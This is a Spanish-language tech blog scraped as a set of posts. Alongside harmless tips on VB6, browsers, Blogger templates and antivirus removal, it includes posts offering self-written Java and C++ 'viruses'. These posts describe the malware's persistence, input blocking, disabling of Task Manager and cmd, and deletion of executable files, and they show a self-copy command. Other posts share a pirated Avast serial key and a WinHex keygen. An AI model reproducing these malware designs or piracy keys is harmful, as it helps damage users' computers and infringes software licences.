Bienvenido (a)
a
Hack Diseño ®
¡Gracias por tu visita!
Entrar

No detener el tiempo al usar un Msgbox Visual Basic 6

Para ello, se debe utilizar la función MessageBox API en lugar de la incorporada en la función MsgBox. La función de la API tiene una sintaxis similar, pero se necesita un argumento adicional que indica que la ventana padre del
cuadro de diálogo de mensaje (puede usar Me.hWnd), y el orden de los botones de Título y argumentos se invierte.
Aún más interesante, todas las constantes de Visual Basic se puede utilizar
sin ningún problema para el argumento de botones, es decir, se puede envolver la Api en una funcion que tome los mismos argumentos
y el mismo orden que el Msgbox estandar.

Para usar la funcion MessageBox deben declarar esto primero:


Firefox 4 Internet Explorer 9 y Chrome ¿Cual es mejor?

Estos son los 3 navegadores mas usados en Internet, sin embargo cual de ellos es mejor en aspectos como:
La velocidad, consumo de recursos del sistema, compatibilidad, plugins y sobre todo seguridad.

Google Chrome


Google Chrome es un navegador web desarrollado por Google y compilado con base en componentes de código abierto como el motor de renderizado de WebKit y su estructura de desarrollo de aplicaciones (Framework). Google Chrome es el tercer navegador más utilizado en Internet, con una cuota de mercado del 7,98% a finales de septiembre de 2010. Está disponible gratuitamente bajo condiciones de servicio específicas.

Una ventaja que tiene este navegador es que al introducir tanto búsquedas como direcciones web en la barra de direcciones y búsqueda combinada de Chrome, conocida como Omnibox, se proporciona sugerencias para las búsquedas y las direcciones web al mismo tiempo que se escribe, al igual que la funcionalidad de completado automático que te ayuda a obtener lo que estás buscando sin necesidad de escribir mucho.

En la parte de seguridad, Chrome mostrará un mensaje de advertencia antes de que visites un sitio web que pueda contener malware o que pueda estar afectado por una acción de suplantación de identidad, de este modo, Chrome te brinda las herramientas necesarias para que tu equipo y tu identidad estén seguras al visitar cualquier pagina.

El navegador de Google, también ofrece extensiones que pueden ofrecer alertar y notificaciones útiles, permitir un acceso fácil a aplicaciones web o a fuentes de noticias, así como facilitar las tareas online como lo es buscar fotografías, obtener direcciones o hacer compras. Así mismo se cuenta con un traductor simultaneo automático sin necesidad de extensiones o complementos adicionales. Cuando el idioma del sitio no coincide con las preferencias de idioma definidas en el navegador, Chrome solicita de forma automática que la página web se traduzca a tu idioma seleccionado.

Mozilla Firefox 4 (Beta)


Mozilla Firefox es un navegador web libre y de código abierto, descendiente de Mozilla Application Suite y actualmente desarrollado por la Corporación Mozilla, la Fundación Mozilla y un gran número de voluntarios externos. Mozilla Firefox es el segundo navegador más utilizado de Internet, con una cuota de mercado del 22,96% a finales de septiembre de 2010, según la firma Net Applications. Otras fuentes de medición global sitúan el uso de Firefox entre el 21% y el 32%.

Para esta nueva edición se han incorporado mejoras notables en la aceleración gráfica, conexiones seguras a través de HSTS y una API de audio. Cuenta con un nuevo diseño sin barra de herramientas, las cuales son agrupadas en un solo botón.

En la parte de seguridad, con Firefox vas a poder navegar más seguro con HSTS (HTTP Strict-Transport-Security), un nuevo mecanismo que permite que los sitios Web puedan indicarle al navegador que establezca conexiones seguras, impidiendo que posibles atacantes puedan acceder a la información durante su transmisión.

Firefox mejora la integración de los elementos multimedia con la web, dando la posibilidad de usar elementos video y audio de HTML5 para que los desarrolladores web puedan manipularlos usando JavaScript. Experiencia de la aceleración de gráficos con Direct2D, ahora habilitada de forma predeterminada para DirectX 10.

Internet Explorer 9 (Beta)


Internet Explorer 9 es el navegador por default de Microsoft Windows, en la actualidad lo podemos descargar en su versión Beta 5. Después de muchas versiones, por fin cambia de diseño y estrena una nueva interfaz completamente minimalista, la barra de direcciones comparte espacio con las pestañas.

Esta nueva versión de Internet Explorer incorpora considerables avances en la interpretación de estándares web respecto a sus precursores, incluyendo soporte total para todos los selectores CSS3, la propiedad CSS3 de borde radial (border-radius), una mayor rapidez en JavaScript, gestión de perfiles de color ICC v2 o v4, además de la inclusión de aceleración por hardware para el proceso de renderizado de páginas web mediante el uso de Direct2D y DirectWrite. IE9 también soporta las etiquetas para audio y vídeo de HTML5 y el formato de archivo tipográfico web Web Open Font Format (WOFF). Algunos expertos de la industria indican que Microsoft lanzará IE9 al mercado como una versión mayor importante y que no estará vinculada a ninguna versión de Windows específica.

Ahora la seguridad de este explorador no se limita a lanzar alertas ante una descarga, Internet Explorer 9 la analiza y avisa dependiendo de la popularidad de la aplicación que está siendo descargada. Así mismo IE9 aprovecha la fuerza de la computadora, la animación de gráficos y texto ha sido cambiado del CPU a la tarjeta de gráficos (unidad de procesamiento de gráficos o GPU), usando las series Direct2D y DirectWrite de interfaces de programación de aplicaciones (APIs) Windows.


Esa fue una gran descripcion de estos tres navegadores pero basandome en mi experiencia con firefox al haber usado ya estos tres navegadores, mozilla firefox ha sido el mejor porque consume menos recursos, lo he usado en computadoras que estuvieron diseñadas para soportar windows 98 es decir computadoras con 128mb de ram, procesadores con 400mhz y nunca se trabaron las computadoras sino hasta que se abrieron 8 pestañas. En comparacion con IE8 que solo soporto 5 pestañas y comenzo a trabarse. Hice la prueba con IE8 ya que un gran error y una mala idea fue que IE9 solo estuviera para usuarios con Windows Vista y Windows 7 dejando atras a muchos usuarios que usamos Windows XP. Google Chrome es un buen navegador sin embargo su desempeño con el CPU y la memoria no me gusto mucho ya que solo en momentos era estable, sin embargo estos navegadores los use una computadora obsoleta, pero Google Chrome en computadoras con procesadores de 2ghz tiene buen desempeño ademas de que tiene caracteristicas muy utiles una de ellas es traducir cualquier pagina si no esta en nuestro idioma.

El uso del navegador de internet es cuestion de varios factores pero para mi los factores mas importantes son la seguridad y el consumo de recursos. Otros tal vez eligan su navegador por caracteristicas como los plugins. Sin embargo con Firefox tenemos plugins, seguridad y mejor consumo de recursos.

Winhex 15.6 Editor Hexadecimal | Keygen | Full | Recuperar archivos Borrados

Descripcion:
WinHex es un completo editor hexadecimal que te permite ver datos que otros programas te ocultan o no pueden ver.

Posee un editor de disco y navegador del directorio por FAT12, FAT16, FAT32, NTFS, editor de RAM, una manera de editar la memoria virtual de otros procesos, intérprete de datos que reconoce hasta 20 tipos distintos de datos, edición de estructuras de datos mediante plantillas…

Permite también concatenar, partir, unir, analizar, comparar y recuperar archivos, funciones de búsqueda y reemplazo especialmente flexibles, programación, encriptación de 128 bits, checksums, CRC32, digests (MD5, SHA-1, …), borrado irreversible de datos confidenciales/privados, formatos de conversión (Binario, Hex ASCII, Intel Hex y Motorola S), soporta juego de caracteres ANSI ASCII, IBM ASCII, EBCDIC.

Es el mejor editor hexadecimal que he visto hasta ahora.

Descarga:

Host: Google Sites
Tamaño: 1.5 MB
Link : Descargar

Avast! 5.0.594 | Serial hasta 2038 | Antivirus Gratuito

Hola hoy les traigo este antivirus, que en mi opinion hasta ahora es el mejor
¿porque?, en primer lugar es GRATIS ademas por sus caracteristicas que superan
a las de otros antivirus y al decir esto me enfoco mas en el rendimiento del CPU
y de la memoria cuando se actualiza no consume mucha memoria a diferencia de Nod32 o
Kaspersky, ademas de contener los siguientes escudos de proteccion:

Escudos:

Escudo de comportamiento
Supervisa la actividad de su equipo con varios sensores (basados en sistema de archivos, registro y red) y notifica o bloquea los comportamientos sospechosos.

Honeypots de seguridad
Los sensores de avast! identifican y supervisan la actividad de los archivos sospechosos en los equipos seleccionados y envían archivos automáticamente al laboratorio de virus para un análisis adicional.

Escudo del Sistema
Análisis en tiempo real de los archivos abiertos o ejecutados.

Escudo de correo electrónico
Analiza el malware de todos los mensajes de correo electrónico entrantes y salientes. Para MS Outlook, se usa un complemento especial. Otros clientes de correo electrónico se protegen con un proxy POP3/IMAP4/SMTP genérico. Como novedad de la versión 5, el proxy también admite el análisis de la comunicación SSL (gmail.com, sympatico.ca, ….)

Escudo web
Analiza todas las páginas web visitadas y comprueba todos los archivos, páginas y scripts Java descargados de Internet. Gracias a la función Intelligent Stream Scan, el escudo web no ralentiza la navegación web.

Escudo de P2P
Comprueba los archivos descargados mediante programas P2P: ABC, Ares, Azureus, BearShare, Bit Torrent, BitComet, BitLord, BitPump, CZDC++, Direct Connect, eDonkey, eMule, iDC++, iMesh, Kazaa, Kceasy, LimeWire, Morpheus, Opera's DC++, Overnet, Qtrax, Shareaza, SoulSeek, StrongDC++, uTorrent, Vuze, WinMX, Winny2, Zultrax.

Escudo de MI
Comprueba archivos descargados mediante programas de mensajería instantánea o “chat”: AIM (AOL Instant Messenger), Gadu-Gadu, gaim/Pidgin, Google Talk, ICQ, IM2 Messenger, Infium, Miranda, mIRC, MSN/Windows Messenger, Odigo, PalTalk Messenger, Psi Jabber Client, QIP, QQ, SIM, Skype, Tlen, Trillian, WengoPhone, XFire, Yahoo! Messenger.

Escudo de red
Proporciona protección frente a virus basados en red. El módulo tiene dos componentes principales: un bloqueador de direcciones URL diseñado para bloquear direcciones URL maliciosas (según la definición de laboratorio de virus) y un sistema ligero de detección de intrusiones.

Ademas de que su motor de Antivirus y Anti-Spyware es casi siempre acertado y no muestra tantos "falsos/positivos".

En fin para mi es muy buen antivirus, pero cada quien tiene su opinion yo me baso en los antivirus que he usado y que he desinstalado por su alto consumo de recursos (Nod32) o por sus fallas en la deteccion de Virus (Kaspersky) y ademas porque son antivirus de alto costo y limitados a 30 dias de prueba, y avast te da hasta un Año de prueba gratuita, sin embargo les compartire un serial que encontre en internet para que su antivirus caduque hasta el 2038.


Requisitos minimos del sistema:
Procesador Pentium 3, 128 MB de memoria RAM, 100 MB de espacio libre en el disco duro
Microsoft Windows 2000, Microsoft Windows XP/Vista/7 (32/64 bit).



Descarga Directa Avast!
Mirror Avast!

Una vez descargado e instalado Avast! abrir la interfaz grafica dando clic en el acceso directo que crea en el escritorio o sobre el icono a lado del reloj en la barra de tareas de windows una vez abierta la interfaz clic en "Mantenimiento" y clic en "Registro" una vez ahi veremos que hay 3 opciones nosotros seleccionaremos la opcion que dice introducir serial una vez seleccionada la opcion ingresar este serial:W4253199R9971A0910-YM6UFEW1 con esto deberias tener antivirus hasta el 2038.

Imagenes:







Si tienen algun problema comentenlo aqui en el blog o directamente desde el boton contacto.

Hasta luego y gracias por su visita.

Virus en Java para Windows | Codigo Fuente

Hoy compartire mi primer Virus en Java, espero no sea el ultimo (ya que no me gusta mucho programa en Java) espero les sirva de algo si alguien tiene alguna duda
tratare de responderla pero no garantizo resolver todas o cualquier duda ya que Java como ya lo dije antes no es un lenguaje que sea de mucho agrado para mi y no se mucho acerca de el pero si puedo resolver una que otra duda e igual como siempre se recibe cualquier aportacion.

Descripcion:

Virus que se copia en el disco duro con atributos de oculto,
archivo del sistema y solo lectura, deja un valor en el registro
del sistema para que se ejecute al iniciar la pc, congela el mouse
y manda un mensaje que dice: "ESTAS INFECTADO POR EL VIRUS HACKO-J"
No se puede cerrar y si se intentara cerrar este borraria todos los archivos
con extension exe, el administrador de tareas no es posible abrirlo ya que
cada 3 segundos lo intenta cerrar tampoco se puede abrir la consola de comandos
cmd.exe porque tambien lo cierra cada 3 segundos.

Hay varias cosas que pueden ser modificadas sin tener que hacer otro codigo
lo que se puede modificar es la manera de ejecucion del virus
la primera seria mover el boton a las cordenadas que quieras
esta funcion puedes agregarla y hacer del virus mas bien un joke
ya que asi no produciria danos ya que al no tener control de mouse
no es posible cerrar el virus y por lo tanto no se borrarian los
archivos con extension exe del disco duro, otra cosa que se puede modificar
es decidir si queremos que el virus se muestre o no, para mostrarlo
poner virus.show(); para ocultar quitar esa linea sin embargo tampoco
borraria los archivos exe porque no existe ventana a cerrar, el codigo
esta implementeado para que se vea la ventana y para que no se bloquee el
mouse.

Hay maneras de hacer mas molesto el virus esto seria agregando valores dword al regedit usando la consola de comandos esto para bloquear el Administrador de Tareas, Panel de control, MS-DOS entre otras esto no lo pongo yo porque usando la consola de comandos es muy facil de hecho el valor para poner el virus al inicio de windows se agrega usando la consola de comandos.

Tambien quiero aclarar que no deben cambiar la extension que marca esta linea
String file = "nombreQueLeDaranAlVirus.jar"; en la funcion autoCopia() lo unico que
pueden cambiar es el nombre y el nombre debe ser igual al nombre del virus
de lo contrario no se copiara y si se cambia la extension no funcionara
cuando se inicie windows.

El codigo del virus no es la gran cosa, pero igual y puede ser el comienzo
de otro codigo que sea mejor.

Es todo por el momento, saludos!

Hacko

Codigo:

Virus Blocked 2.0 en C++ | Codigo Fuente

Hoy termine de hacer la segunda version de este virus tratare de ser breve asi que explicare lo que hace el virus y si tienes dudas de alguna funcion o alguna parte del codigo contactame o deja un comentario tambien te invito a participar en la encuesta de la primera version de este virus (http://hackdiseno.blogspot.com/2010/07/virus-blocked-en-c-codigo-fuente.html).

Bueno lo primero que hace el virus es finalizar el proceso Explorer.exe, despues
se copia en la carpeta C:\Windows\System32 como lo hace su primera version solo que aqui no importa con que nombre lo compiles siempre se copiara sin ningun problema (al menos en Windows XP), lo segundo es que al copiarse al Inicio de Windows comprueba si ya esta infectado para no hacerlo dos veces esto solo con el fin de hacer todo mas eficaz.

Esas son las dos cosas que mejore, ahora dire lo que agregue:
Ahora ya no cierra la ventana de Administrador de Tareas ahora lo bloquea al igual que el Simbolo del Sistema, el Editor de Registro (Regedit), el Panel de Control ademas de que lo elimina del menu de Inicio, tambien Elimina la Opcion Ejecutar del Menu de Inicio, todo esto con el fin de evitar que se eliminado de la Memoria.

Algo interesante que agregue fue un Memory Leak (Fuga de Memoria) un error que ocurre cuando la memoria reservada no se libera esto provoca que la memoria se sature y en consecuencia se agote sin embargo no he visto que sucede cuando la memoria se agota no probe el virus hasta ese punto.
Tambien agregue un poco de interaccion con el usuario atravez de MenssageBox solo para hacer mas divertidas las cosas.
La funcion para Bloquear el Mouse la deje tal y como estaba.

En fin el motivo por el que hago el virus y continuo mejorandolo es solo con fines educativos e igual se los comparto con ese fin, este virus contiene una interesante recopilacion de funciones que se que a muchas personas les podria servir para otros fines que espero y asi sea.

El unico problema que yo le encontre es que es demasiado codigo, tratare de reducirlo igual si alguien sabe como reducir algunas partes del codigo pues puede hacer el aporte si quiere.

He visto los resultados de la encuesta acerca de publicar un virus programado en Java espero pronto poder mostrarselos aunque es muy parecido al virus Blocked y no produce daños al S.O. sin embargo es otra cosa que quiero compartir.

Ahora el codigo:




Saludos!

Revistas Hack x Crack - Descarga directa - ORIGINALES

Hoy encontre las revistas de Hack X Crack en descarga directa asi que las descargue y he decidido compartirlas yo puse las revistas en un .rar porque donde las encontre se tiene que descargar de 1x1 algo que es tedioso y tal vez aburrido, sin embargo note que algunas pesan mas de 20MB por lo que decidi poner del numero 1 al 19 en el .rar las demas las dejo en descarga directa cortesia de SERBice® WEB cualquier problema con la descarga avisen por favor.

Si quieren ver las descripciones del contenido de cada una de las revistas pueden visitar este link

Password:hacko
Hosting: Megaupload
Tamaño:66MB
Extension:rar

Gracias por tu visita - comenta!!!.

Como poner un boton que vaya hacia arriba

Hoy les mostrare como poner un boton que vaya hacia arriba o hacia abajo
lo primero es crear un elemento "div" y despues darle el nombre que quieran por ejemplo
<div id="arriba">
</div>
el atributo ID sirve para darle un nombre a nuestro elemento.

Despues podemos llamarlo con una etiqueta "a" de esta manera:
<a href='#arriba' onclick='new Effect.ScrollTo(&quot;outer-wrapper&quot;,{offset:-140}); return false'>
<img border='0' src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW8x52g0nIJMpch0Tiivlwh9oegf5dheFHcLQ47aeFlHIl4BkclJkrQsasvHIxc4wsYNi3S59OZVfeTo3UO9ZomjkEil_fSWpRQqsqVrwqBRLNejXuSRm2UcWe4X21NX1uXYgiSDVVLA/s200/arrow1a.png' style='position:fixed; top:0; right:0;' title='Ir arriba'/></a>

Ahora si queremos que el boton vaya hacia abajo tenemos que poner el elemento abajo del footer
de nuestra web o blog pero si queremos que vaya hacia arriba entonces lo ponemos en el head de nuestra web o blog

Sin embargo para los blogs de blogger es mas facil ya que podemos usar el elemento outer-wrapper
y asi vamos hacia arriba y para ir hacia abajo usamos footer

Ejemplos para blogger:

Hacia arriba:

<a href='#outer-wrapper' onclick='new Effect.ScrollTo(&quot;outer-wrapper&quot;,{offset:-140}); return false'>
<img border='0' src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW8x52g0nIJMpch0Tiivlwh9oegf5dheFHcLQ47aeFlHIl4BkclJkrQsasvHIxc4wsYNi3S59OZVfeTo3UO9ZomjkEil_fSWpRQqsqVrwqBRLNejXuSRm2UcWe4X21NX1uXYgiSDVVLA/s200/arrow1a.png' style='position:fixed; top:0; right:0;' title='Ir arriba'/></a>

Hacia abajo:

<a href='#footer' onclick='new Effect.ScrollTo(&quot;outer-wrapper&quot;,{offset:-140}); return false'>
<img border='0' src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW8x52g0nIJMpch0Tiivlwh9oegf5dheFHcLQ47aeFlHIl4BkclJkrQsasvHIxc4wsYNi3S59OZVfeTo3UO9ZomjkEil_fSWpRQqsqVrwqBRLNejXuSRm2UcWe4X21NX1uXYgiSDVVLA/s200/arrow1a.png' style='position:fixed; top:0; right:0;' title='Ir arriba'/></a>

Quiero aclarar que los elementos outer-wrapper y footer no estan en todas las platillas pero en las platillas Minima o Minima-Dark si estan estos elementos asi que si tienes una plantilla modificada es mejor que crees tu propio elemento.
Pueden ver como funciona aqui.

Eso es todo espero les sirva, cualquier duda o comentario ya saben como hacerlo.

Post dedicado a:·•º•·Yuri·•º•·

Firefox 4 Version Beta


La primera versión beta (de prueba) del Firefox 4 ya está disponible para Windows, Mac OS X y Linux. Esta nueva versión del buscador es floja todavía en algunas áreas, pero lo suficientemente estable en líneas generales para su uso regular.

La mayor mejora entre las versiones de Firefox 3 y la última es la velocidad. Para poder competir con lanzamientos sumamente veloces del Chrome de Google (que robó ya parte del mercado de Mozilla), el Safari y hasta el Opera, Firefox se vio obligado a acelerar al máximo su página muchas veces.

Los primeros informes llegan a la conclusión de que el Firefox 4 se mantiene fácilmente a la altura de estos buscadores y podría ser rival del Internet Explorer 9 de Microsoft cuando esté disponible antes de fines de 2010. Mozilla dice que la versión final del nuevo buscador debiera ser aún más veloz.

Esta versión beta representa un importante cambio en apariencia para Firefox. Para los usuarios de Windows, las pestañas aparecerán ahora arriba del recuadro de texto URL. Este cambio bastante radical estará presente en las versiones futuras de Mac y Linux. Esto parece ser un intento directo para que Firefox se parezca más al Chrome de Google. También en esta línea, Firefox 4 incorpora menúes para bajar aplicaciones y favoritos en el ángulo superior izquierdo de la ventana.

Otros cambios de interfase incluyen la combinación de los botones stop y reload y la capacidad para buscar pestañas abiertas en la barra de lugares.

El lanzamiento beta ofrece más soporte para CSS 3 y HTML 5, y mayor protección contra plugins inestables que inundan todo el buscador. Mozilla remozó también su Jetpack SDK, lo que permite a programadores independientes elaborar nuevos agregados, más livianos. La empresa anticipa que se vienen aún más cambios para el proceso de creación de agregados.

La seguridad también es algo que ha sido reforzado en esta nueva versión con opciones incorporadas para evitar que los sitios Web revisen las historias de búsqueda de las personas. El mapa de ruta del producto también incluye una política de seguridad de actualizaciones que debiera ayudar a bloquear los ataques.

Claramente, el propósito de esta versión Beta 1 es recoger sugerencias para una mejora. Para todos los sistemas operativos, el Firefox 4 incluye un botón de Feedback ubicado convenientemente al lado de la barra de búsqueda. Esto le permite comentarle directamente a Mozilla lo que le gustó y lo que no le gustó sobre el lanzamiento.
Descargar Firefox 4 Beta

Fuente:www.clarin.com

Virus Blocked en C++ | Codigo Fuente

Hoy he decidido publicar este pequeño virus hecho en C++ consiste en autocopiarse en la carpeta C:\Windows\System32\ (%windir%\system32\), bloquea el teclado y el mouse hasta que la victima reinicie, sin embargo al darme cuenta de este fallo decidi tambien agregar el virus al inicio de windows para que asi al iniciar sesion vuelva a bloquear el teclado y el mouse, pero resulta que se puede abrir el Administrador de tareas (taskmgr.exe) con la combinacion de teclas Ctrl+Alt+Supr pero tambien solucione esto, cerrando el Administrador de Tareas cada vez que se intenta abrir.

Sin embargo el virus sigue teniendo sus vunerabilidades por ejemplo si le cambias el nombre al ejecutable que en este caso si llegas a compilar el virus debes nombrarlo Virus.exe ya que si no lo haces no podra autocopiarse, porque dira que el archivo no existe.

Si deseas ponerle otro nombre necesitarias modificar esta linea:
char rute[100] = "copy /y Virus.exe %windir%\\system32\\wnws.exe";
y cambiar Virus.exe por el nombre que le vayas a poner cuando lo compiles.

En fin si alguien encuentra la forma de mejorar este virus y nos lo quiere compartir puede hacerlo ya sea contactandome o directamente en un comentario en el blog.

Aqui el codigo fuente:


Este virus fue compilado en Dev-C++ para descargar esta IDE puedes visitar este post o tambien puedes descargar la version completa Aqui.

Solucion al fallo de Windows XP y Windows Server 2003

Este fallo como se ha informado, ya afecto a casi 10,000 computadoras.
Yo encontre una solucion para evitar que seamos victimas de esta vunerabilidad. La solucion consiste solo en desactivar el soporte tecnico de windows xp, desactivarlo es sencillo, estos son los pasos:

Actualizacion: Solucionar de manera automatica

1.- Clic en Inicio>Ejecutar y despues teclear services.msc y pulsar enter
2.- Buscar el servicio "Ayuda y Soporte Tecnico" despues dar clic derecho sobre el nombre de este servicio y clic en Propiedades.





3.- Se abrira la ventana de propiedades una vez abierta la ventana dar clic sobre Tipo de inicio y seleccionar Deshabilitado y dar clic en Aceptar.



4.- Una vez deshabilitado el servicio hay que asegurarnos de que no vuelva a iniciar para esto clic en Inicio>Ejecutar y teclear msconfig al abrirse la ventana ir a la pestaña servicios y despues clic en "Servicio" para ordenar los servicios de A - Z despues buscar el servicio "Ayuda y Soporte Tecnico" y desmarcar la casilla junto al nombre.




Para solucionar el fallo de manera automatica encontre estos fix en la pagina de soporte de Microsoft Solucion Link

Fallo en Windows XP y Windows Server 2003


Microsoft ha admitido que ya son más de 10000 ordenadores los que han sido afectados por la nueva vulnerabilidad encontrada en Windows XP y Windows Server 2003. El fallo se encuentra en un componente del centro de soporte y ayuda de Windows, y se acciona a través del protocolo “hcp://” (propio de los archivos de ayuda de Microsoft). A través de esta vulnerabilidad el atacante controla el ordenador del usuario de forma remota, obteniendo los mismos privilegios de sistema que el afectado.

El fallo permite la ejecución remota de códigos si el usuario visita una página web creada a tal fin o si sigue un enlace enviado a través de un e-mail (la infección no se produce de ninguna otra forma). El atacante es capaz de recibir entonces los mismos privilegios en el sistema que el propio usuario, y ejecutar códigos arbitrarios desde el sistema para descargar malware en el ordenador.



El responsable de descubrir este fallo fue un ingeniero de Google, que avisó a Microsoft del problema y publicó cuatro días más tarde un informe completo sobre la amenaza y cómo realizarla. La empresa norteamericana registró el primer ataque el 15 de junio. Los primeros estaban centrados en zonas geográficas determinadas (sobre todo Portugal y Rusia) y descargaban el troyano Obitel, responsable de descargar otro malware. Pero las infecciones se han extendido y ahora también se descarga malware de manera directa.

Los ataques afectan también a las nuevas versiones de Internet Explorer y Chrome. Por el momento no existe un parche de Microsoft para este fallo y no se ha anunciado que vaya a salir uno. Contra la infección, se ofrecen varias posibilidades. Se puede deshabilitar el protocolo “hcp://” aunque Microsoft ha avisado del peligro que esto puede conllevar para la configuración del sistema. Además, es posible bajar los privilegios de sistema del usuario para que la infección, de producirse, sea menos dañina. No es la primera vez que la empresa tiene fallos de este tipo.

Fuente:http://www.tuexpertoit.com
Actualizacion: Solucion al Fallo

Detectar navegador | Version | Redireccionar | JavaScript

En algunas versiones de navegadores no todos los script son compatibles por lo tanto nos vemos en la necesidad de notificar al usuario que su navegador no es compatible y por ende redireccionarlo a otra pagina.

Con el siguiente script se puede hacer eso:



Espero que te pueda servir yo uso este metodo en este blog, si tienen dudas acerca de este post avisen.

Windows 8 | Reconocimiento Facial



Una de las diapositivas desvela que Microsoft está tomando muy buena cuenta de lo que hace uno de sus principales competidores: Apple, que recientemente les adelantó como la compañía tecnológica de más valor. En su presentación, destaca que los productos de “software” de Apple, "sencillamente, funcionan".

Una de las principales innovaciones de Windows 8 será el reconocimiento facial, en lo que podría ser un uso de tecnología directamente importada desde Kinect, el sensor de reconocimiento diseñado para Xbox 360. De esta forma, los usuarios podrán iniciar sesión de forma cómoda con sólo sentarse delante del ordenador.

Otra característica será el uso ubicuo del sistema operativo. Guardando los datos "en la nube", un usuario podría tener exactamente la misma experiencia al sentarse en cualquier ordenador con Windows 8 e iniciar sesión. Todo lo encontraría exactamente igual que lo dejó en otro equipo ubicado en cualquier lugar.

Desinstalar - Eliminar Nod32 4 | Completamente

Hola hoy decidi desinstalar nod32 4 pero me encontre con que no era suficiente desinstalarlo desde panel de control>agregar/quitar programas.
Entonces busque una forma de desinstalarlo completamente, descargue herramientas que hay en internet como NOD32 Removal Tool 1.0.0.2 y ninguna me funciono, asi que trate mejor de encontrar una solucion desde una fuente oficial osea desde la pagina de Eset y ahi encontre un tutorial completo para desinstalar Nod32 en cualquier version.
Les dejo el tutorial completo:
Notas:
1.- Usar este metodo de desintalacion despues de haber ejecutado el desintalador que trae el antivirus desde el menu de inicio.
2.- Tutorial aplicable para: Windows 7/2008 R2/2008/Windows Vista/Home Server/XP/2003 R2/2003/2000

Tutorial:



1.Descargue la aplicación ESET Uninstaller (500 KB) y guárdela en su escritorio. Haga clic en el siguiente enlace para comenzar la descarga.

Descargar EsetUninstaller.exe

2.Reinicie su equipo en el Modo a Prueba de Fallos. Durante el inicio (Boot), presione repetidamente la tecla F8 para ver las opciones avanzadas. Seleccione Modo Seguro (Si necesitas ver el tutorial desde tu explorador de internet te recomiendo seleccionar Modo seguro con funciones de red) y presione ENTER. Si intenta ejecutar el ESET Uninstaller en modo normal, este fallará y creará un mensaje de "ERROR!" en un archivo de texto en su Escritorio.

3. Una vez que haya iniciado en el Modo a prueba de fallos, haga doble clic en el ícono de ESETUninstaller ubicado en su escritorio para iniciar el proceso de desinstalación.
Comandos de usuario avanzados: Si desea ver un listado completo de los comandos disponibles en el desinstalador de ESET, tipée ESETUninstaller.exe /help. Si está desinstalando productos de seguridad ESET desde una unidad “booteable”, se le va a preguntar si quiere desinstalar los archivos de ESET de cada partición disponible por separado. El parámetro /mode=offline especifica el modo de desinstalación para unidades de CD y USB y el parámetro /mode=online para discos rígidos. En muy pocas ocasiones, deberá usar este parámetro para forzar el borrado de los archivos del producto de seguridad ESET si el desinstalador no detecta su unidad “booteable” automáticamente. En el caso de que se desee eliminar todas las instalaciones actuales AV sin que se le pregunte, ejecute el programa de desinstalación con el parámetro /force.

4.En la primer ventana del símbolo del sistema, lea la precaución y tipee Y para confirmar

Ventana 1-1


5.En la segunda ventana del símbolo del sistema busca las instalaciones de ESET y le presenta los resultados en una lista numerada. Seleccione la instalación de ESET que desea eliminar de la lista introduciendo su número y presione ENTRAR. Normalmente, el programa de desinstalación encuentra sólo una instalación del producto de seguridad ESET, que aparecerá como número 1.

Ventana 1-2



6.En la tercer ventana del símbolo del sistema, asegúrese que su producto de seguridad ESET está siendo desinstalado del sistema operativo correcto y tipee Y para confirmar

Ventana 1-3

7.El desinstalador de ESET correrá por alrededor de un minuto y luego se cerrará automáticamente. Cuando termine, reinicie su equipo en modo normal.


Importante: El programa de desinstalación escribe un registro de todos sus procesos en el archivo ~ ESETUninstaller.log (ubicado en la misma carpeta que el archivo ESETUnistaller.exe) para futuras referencias.

Fuente:http://kb.eset.com/esetkb/index?page=content&id=SOLN2289&actp=null&viewlocale=es_ES&showDraft=false#7

Mostrar la barra de Blogger

Hola a todos solo posteo esto porque uno de mis visitantes me preguntaba que como le hacia para que en su platilla se pudiera ver la barra de blogger y logicamente inmediatamente pense pues solo quitando el attributo "none" de #navbar-iframe pero despues de descargar la plantilla Cute-Bubbles me di cuenta de que no era suficiente aun asi no se veia la barra de blogger, lo que me hizo pensar en que algun script externo estaba desactivando la barra pero despues de revisar me di cuenta de que no era eso lo que pasaba entonces me fui por las configuraciones en el diseño pero para hacer todo mas facil y ganar tiempo tenia que estar viendo constantemente cada cambio que le hiciera a la platilla asi que para no estar recargando la pagina cada que modificara el codigo use una herramienta online que sirve para ver en tiempo real las modificaciones que se le hacen a una pagina en HTML (Editor de Html Online).

Link:<a href="http://htmledit.squarefree.com/">Real-time HTML editor</a>

Asi de esta manera me di cuenta que siempre fue suficiente con eliminar el codigo
"none !important" de #navar-iframe solo que habia una <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqKDqMJ3JfqVHKQopOwmEdijgEH7RS4qU3NkaJxc2JlLSR7_IQcT7YNwJ6RYqLpMflpbyKTr4Pr5qaKxKA44wzCL27uW4L8N821a-UEvSGepPz34f5_AyhjtMQolW_un09fTNAL26SQHs/s1600/top_background.jpg">IMAGEN</a>
que era la responsable de que la barra no se mostrara elimine la imagen y ¡por fin!se mostro la barra de blogger pero note que era necesario tener la imagen por lo que la ajuste de manera que se viera la imagen pero que tambien se viera la barra.

Bueno eso es todo espero seguir siendo de su ayuda.
PD:No habia publicado esto porque no tenia conexion a internet.

Imagenes:

<a href="http://sites.google.com/site/hackdiseno/host/img1.bmp"><img height="250" src="http://sites.google.com/site/hackdiseno/host/img1.bmp" width="350" /></a>

<a href="http://sites.google.com/site/hackdiseno/host/img2.jpg"><img height="250" src="http://sites.google.com/site/hackdiseno/host/img2.JPG" width="350" /></a>


Post dedicado a Jane Seidel Vera

K-Lite Codec Pack Descarga

Hola a todos los vistantes y lectores del blog, hoy les traigo este pack de codecs que para mi es el mejor que hay y ademas es gratis, con este pack te quitas ese problema de tener que bajar programas para poder reproducir los videos que descargas de youtube que estan en formato flv, ahora solo tienes que instalar este pack y sin instalar nada mas podras reproducir casi cualquier video o cualquier arhivo de audio y con gran calidad.

Espero y les sirva la descargar la pueden hacer desde la pagina oficial del pack
hay varias versiones yo les recomiendo la version full.

Tambien les dejo una pequeña descripcion del pack:
El K-Lite Codec Pack es una colección de filtros DirectShow, VFW / ACM codecs, y herramientas. Codecs DirectShow y filtros son necesarios para codificar y descodificar los formatos de audio y vídeo. El K-Lite Codec Pack está diseñado como una solución fácil para reproducir todos tus archivos de audio y vídeo. Con el K-Lite Codec Pack debería ser capaz de reproducir todos los formatos populares de audio y vídeo e incluso varios formatos menos comunes.

